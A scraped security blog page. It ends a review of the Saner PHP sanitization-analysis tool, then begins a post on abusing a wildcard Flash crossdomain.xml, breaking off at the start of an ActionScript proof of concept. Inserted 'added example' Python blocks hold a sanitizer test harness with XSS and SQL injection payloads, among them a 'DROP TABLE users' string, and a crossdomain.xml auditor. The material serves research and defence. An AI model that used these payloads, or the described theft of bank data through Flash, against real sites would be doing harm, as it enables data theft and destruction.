<b style="font-weight: normal;"><br /><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></b>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguIKRiPjjyd07WvKOq4IfCi_9h1COLn-DOBfFFmE-VuOUPNbiW1vSsN6-UV6IxVcrORit5JqR1ME_DTsx-5TiQXkRl_0oKuww1FKdv-7wWkw5e9VtN6w6DqsrbkzL9QmI0Fb7wjcRnEjL2/s1600/Static_Analysis_graph.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img alt="" border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguIKRiPjjyd07WvKOq4IfCi_9h1COLn-DOBfFFmE-VuOUPNbiW1vSsN6-UV6IxVcrORit5JqR1ME_DTsx-5TiQXkRl_0oKuww1FKdv-7wWkw5e9VtN6w6DqsrbkzL9QmI0Fb7wjcRnEjL2/s400/Static_Analysis_graph.jpg" title="" width="391" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="color: #4f81bd; font-family: Calibri; font-size: 12px; font-weight: bold; line-height: 12px; text-align: left; white-space: pre-wrap;">Figure 2: Image summarizes the static analysis phase</span></td></tr>
</tbody></table>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: large;">Dynamic Analysis</span></span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The static phase is conservative and may generate false positives, which requires developers to manually inspect the code to weed them out. The dynamic analysis component attempts to automate this step by directly executing the custom sanitization routines on a set of malicious inputs and then analyzing the output to determine whether the malicious characters were sanitized.</span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">After receiving the source-sink pairs from the static analysis component, the dynamic analysis extracts all the nodes pertinent to the custom data sanitization and abstracts away all other application details. It then calculates a sanitization graph for each source-sink pair and uses that information to construct all possible paths from source to sink.</span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Based on the type of the sink, a test suite (XSS or SQL injection) is selected for evaluation. For example, if the sink forms a portion of a SQL query, the SQL injection test suite is run on the corresponding data flow paths. The final step invokes the PHP interpreter to evaluate the result of executing each block of code on the corresponding test suite.</span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The result of each test is then analyzed by an oracle function that checks for the occurrence of particular substrings, and the report is categorized as a true positive or a false positive.</span></div>
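The dynamic phase described above, as an added example that is not Saner's code: Saner drove the PHP interpreter over the extracted sanitization paths, while this Python harness runs a few constructed sanitizer functions (stand-ins for the custom routines a static phase would extract) over a per-sink test suite and applies a substring oracle to each output, reporting the static-phase finding as a true positive when any vector survives. It is also the shape of the unit-test use mentioned in the observations below. The test vectors, oracle strings and function names are constructed for illustration.

```python
"""Dynamic check of custom sanitizers, in the spirit of Saner's second phase.

Added example, not Saner's own code. Each candidate sanitizer is executed on
the test suite matching its sink type, and an oracle inspects the output for
a telltale substring. If any vector survives, the static-phase report is a
true positive; if none does, it is a false positive for this suite.
"""
import html
import re
from typing import Callable, Dict, List

Sanitizer = Callable[[str], str]

# Test suites keyed by sink type (constructed; a real suite is much larger).
TEST_SUITES: Dict[str, List[str]] = {
    "html": [
        "<script>alert(1)</script>",
        "<SCRIPT>alert(1)</SCRIPT>",
        "<scr<script>ipt>alert(1)</script>",
        "<img src=x onerror=alert(1)>",
    ],
    "sql": [
        "' OR '1'='1",
        '" OR "1"="1',
        "'; DROP TABLE users; --",
    ],
}

# Oracles: does the output still carry what the sink must never see?
ORACLES: Dict[str, Callable[[str], bool]] = {
    "html": lambda out: "<" in out,                                # a tag can still open
    "sql": lambda out: re.search(r"(?<!\\)['\"]", out) is not None,  # an unescaped quote
}


# --- Constructed "custom sanitization routines" under test -----------------

def strip_script_once(s: str) -> str:
    """Removes literal <script> tags in a single pass (weak)."""
    return s.replace("<script>", "").replace("</script>", "")


def strip_script_case_insensitive(s: str) -> str:
    """Regex strip of script tags, ignoring case, but only that tag (weak)."""
    return re.sub(r"</?script>", "", s, flags=re.IGNORECASE)


def escape_html(s: str) -> str:
    """Escapes every HTML meta-character (the right fix for an HTML sink)."""
    return html.escape(s, quote=True)


def strip_single_quotes(s: str) -> str:
    """Drops single quotes only; double quotes pass through (weak)."""
    return s.replace("'", "")


def addslashes(s: str) -> str:
    """PHP-style addslashes(): backslash before quotes and backslashes."""
    return re.sub(r"([\\'\"])", r"\\\1", s)


# --- The harness -----------------------------------------------------------

def evaluate(sanitizer: Sanitizer, sink_type: str) -> Dict[str, object]:
    """Run one sanitizer over its sink's suite and classify the report."""
    oracle = ORACLES[sink_type]
    survivors = [v for v in TEST_SUITES[sink_type] if oracle(sanitizer(v))]
    return {
        "verdict": "true positive" if survivors else "false positive",
        "survivors": survivors,
    }


CANDIDATES = [
    (strip_script_once, "html"),
    (strip_script_case_insensitive, "html"),
    (escape_html, "html"),
    (strip_single_quotes, "sql"),
    (addslashes, "sql"),
]


def run_all() -> Dict[str, str]:
    """Verdict for every (sanitizer, sink) pair, keyed 'name/sink'."""
    return {f"{fn.__name__}/{sink}": evaluate(fn, sink)["verdict"]
            for fn, sink in CANDIDATES}


if __name__ == "__main__":
    for fn, sink in CANDIDATES:
        result = evaluate(fn, sink)
        print(f"{fn.__name__:30s} [{sink}] {result['verdict']}: {result['survivors']}")
```

Note that the harness is only as strong as its suite and oracle: a sanitizer that passes this suite has passed these vectors, not all of them, which is exactly the limitation raised in the first observation below.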
<b style="font-weight: normal;"><br /><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></b>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3cSD80o75GIfRB7KoDWGwAueXEQQ9K9TPt2tw6684USCbTKTxv2Np7IgOgthl3VJRyA4VdEon6_XSHQO96LeT-wD9rRdj-ssfWZvvNiv36GyzvqeI3fa73qelMRRLZxmYkZOS7K5NXv4Y/s1600/Dynamic-analysis-flowchart.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="167" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3cSD80o75GIfRB7KoDWGwAueXEQQ9K9TPt2tw6684USCbTKTxv2Np7IgOgthl3VJRyA4VdEon6_XSHQO96LeT-wD9rRdj-ssfWZvvNiv36GyzvqeI3fa73qelMRRLZxmYkZOS7K5NXv4Y/s400/Dynamic-analysis-flowchart.jpg" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="color: #4f81bd; font-family: Calibri; font-size: 12px; font-weight: bold; line-height: 12px; text-align: left; white-space: pre-wrap;">Figure 3: Image summarizes the dynamic analysis phase</span></td></tr>
</tbody></table>
<br />
<b style="font-weight: normal;"><span style="background-color: transparent; color: #4f81bd; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></b><br />
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: large;">Results</span></span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Saner identified 13 novel vulnerabilities across five open source PHP applications. The time required to perform analysis was in the order of a few minutes for almost all applications.</span></div>
<b style="font-weight: normal;"><br /><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></b>
<br />
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: large;">Observations</span></span></div>
<ol style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The effectiveness of Saner’s dynamic analysis is primarily driven by its input test suite, which is limited. The whitepaper does not discuss the mutation engines, if any, used for the attack vectors. An intelligent mutation engine could make the tool more effective. Additionally, the tool was written to identify XSS vectors that rely on the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> symbol. Including other XSS injection techniques could also increase the detection rate.</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The interesting custom validation bypasses that Saner identified and discussed in the paper were Cross Site Scripting attacks; the authors did not discuss any identified SQL injection vulnerability.</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The dynamic analysis component can also be leveraged to write unit test cases for PHP web applications. I could not find the Saner source code and plan to reach out to the authors to check its availability.</span><br />
<br /></div>
</li>
</ol>
<span style="font-family: Calibri; font-size: large; font-weight: bold; line-height: 27px; white-space: pre-wrap;">Nov 8, 2013 Update</span><br />
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">I contacted the authors and it appears that Saner source code was never released and is not traceable.</span><br />
<div>
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
</div>
<span style="font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"></span></div>
Gursev Singh Kalrahttp://www.blogger.com/profile/11125392470187170013noreply@blogger.com6tag:blogger.com,1999:blog-4663432300421783651.post-39380470074097653682013-08-28T04:00:00.000-07:002013-09-19T14:00:38.244-07:00Exploiting Insecure crossdomain.xml to Bypass Same Origin Policy (ActionScript PoC)<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Adobe Flash is among the most popular browser plugins and also ships by default with a couple of popular web browsers. Its widespread prevalence has made it a frequent target of attacks, and it has also been used as a vector to launch attacks. One such attack vector is to use Flash for cross-domain data access.</span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">In this blog post we will review a known attack vector and create a Proof of Concept exploit that bypasses the browser’s Same-origin policy for websites that host an overly permissive cross-domain policy file.</span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: large;">Cross-domain Policy Files</span></span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Flash Player’s default security model enforces a same origin policy similar to that of contemporary browsers and does not allow cross-domain data read operations. However, it makes an exception to this rule and disregards its default security model if the website in question hosts a cross-domain policy file (named crossdomain.xml) that allows data access from other domains. Insecurely written cross-domain policy files can expose critical application data over the internet. The policy file below shows one such example, where the website opens itself to read access from every running instance of Flash Player.</span></div>
<div dir="ltr">
<table style="border-collapse: collapse; border: none;"><colgroup><col width="638"></col></colgroup><tbody>
<tr style="height: 0px;"><td style="background-color: #d9d9d9; border: 1px solid #000000; padding: 0px 7px 0px 7px; vertical-align: top;"><div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 12pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><cross-domain-policy> </span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span><allow-access-from domain="*" /> </span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></cross-domain-policy></span></div>
<br />
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></td></tr>
</tbody></table>
</div>
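Added example, not from the original post: a small audit script that parses a crossdomain.xml and flags the permissive settings discussed here (a wildcard domain, plus a few related attributes from Adobe's policy-file format: secure="false" on allow-access-from, a wildcard allow-http-request-headers-from, and site-control permitted-cross-domain-policies="all"). The permissive policy is the one shown above; the tightened policy beside it is constructed, and www.example.com is a placeholder.

```python
"""Audit a Flash crossdomain.xml for settings that grant cross-origin reads.

Added example (not from the original post). The permissive policy is the
one from the post; the restricted one is a constructed counterpart that
names an explicit origin, requires HTTPS, and lets only this master file
grant access.
"""
import xml.etree.ElementTree as ET
from typing import List

PERMISSIVE_POLICY = """<?xml version="1.0"?>
<cross-domain-policy>
    <allow-access-from domain="*" />
</cross-domain-policy>"""

# Constructed tightened policy; www.example.com is a placeholder.
RESTRICTED_POLICY = """<?xml version="1.0"?>
<cross-domain-policy>
    <site-control permitted-cross-domain-policies="master-only" />
    <allow-access-from domain="www.example.com" secure="true" />
</cross-domain-policy>"""


def audit_crossdomain(xml_text: str) -> List[str]:
    """Return human-readable findings; an empty list means nothing flagged."""
    findings: List[str] = []
    root = ET.fromstring(xml_text)
    if root.tag != "cross-domain-policy":
        return [f"unexpected root element <{root.tag}>"]

    for elem in root.findall("allow-access-from"):
        domain = elem.get("domain", "")
        if domain == "*":
            findings.append(
                'allow-access-from domain="*": a SWF on any site may read responses '
                "with the victim's cookies attached")
        elif domain.startswith("*."):
            findings.append(
                f'allow-access-from domain="{domain}": every subdomain is trusted, '
                "so a compromise of any one of them extends to this host")
        # The attribute defaults to true; an explicit "false" lets SWFs loaded
        # over plain HTTP read content from this HTTPS host.
        if elem.get("secure", "true").lower() == "false":
            findings.append(
                f'allow-access-from domain="{domain}" secure="false": '
                "SWFs loaded over HTTP may read HTTPS content")

    for elem in root.findall("allow-http-request-headers-from"):
        if elem.get("domain") == "*":
            findings.append(
                'allow-http-request-headers-from domain="*": any origin may send '
                "custom request headers")

    site_control = root.find("site-control")
    if site_control is not None and \
            site_control.get("permitted-cross-domain-policies") == "all":
        findings.append(
            'site-control permitted-cross-domain-policies="all": any file on the '
            "host may be treated as a policy file")

    return findings


if __name__ == "__main__":
    for label, policy in (("permissive", PERMISSIVE_POLICY),
                          ("restricted", RESTRICTED_POLICY)):
        print(f"[{label}]")
        for finding in audit_crossdomain(policy) or ["no findings"]:
            print("  -", finding)
```

The fix for the permissive file is the restricted one: list only the origins that genuinely need to read data, keep secure="true", and pin the master policy so that no other file on the host can widen access.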
<b id="docs-internal-guid-303d9871-b963-abd6-7f69-fc38c78e978d" style="font-weight: normal;"><br /><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></b>
<br />
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">To understand the impact of such a cross-domain policy file, let us consider a scenario where a bank website hosts one.</span></div>
<ol style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">A user logs on to the banking website. </span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The user then visits another website in a different browser tab, and that website hosts a malicious Flash file that retrieves user information from the bank website. </span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">When Flash Player notices an attempt to perform a cross-domain read operation, it retrieves the crossdomain.xml file from the bank website to discover the permitted operations. </span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">It then sends out a read request to a known bank URL that returns sensitive information like user bank account numbers, account balance etc… </span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The browser adds the user’s session cookies to the outgoing request and, since the user is logged in, the malicious Flash file is served with critical user information. </span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The Flash file then passes it on to the malicious server.</span></div>
</li>
</ol>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: large;"><br /></span></span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: large;">The ActionScript exploit code</span></span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">I wanted to demonstrate the impact of this vulnerability but could not find a Proof of Concept ActionScript code. After tinkering around with ActionScript and Apache Flex SDK, I had a working PoC which is provided below along with the HTML file that I used to embed the Flash file.</span></div>
<div dir="ltr">
<table style="border-collapse: collapse; border: none;"><colgroup><col width="638"></col></colgroup><tbody>
<tr style="height: 0px;"><td style="background-color: #d9d9d9; border: 1px solid #000000; padding: 0px 7px 0px 7px; vertical-align: top;"><div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 12pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">// Author: Gursev Singh Kalra (gursev.kalra@foundstone.com)</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">// XDomainXploit.as</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">package {</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span>import flash.display.Sprite;</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span>import flash.events.*;</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span>import flash.net.URLRequestMethod;</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span>import flash.net.URLRequest;</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span>import flash.net.URLLoader;</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<br />
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span>public class XDomainXploit extends Sprite {</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span>public function XDomainXploit() {</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
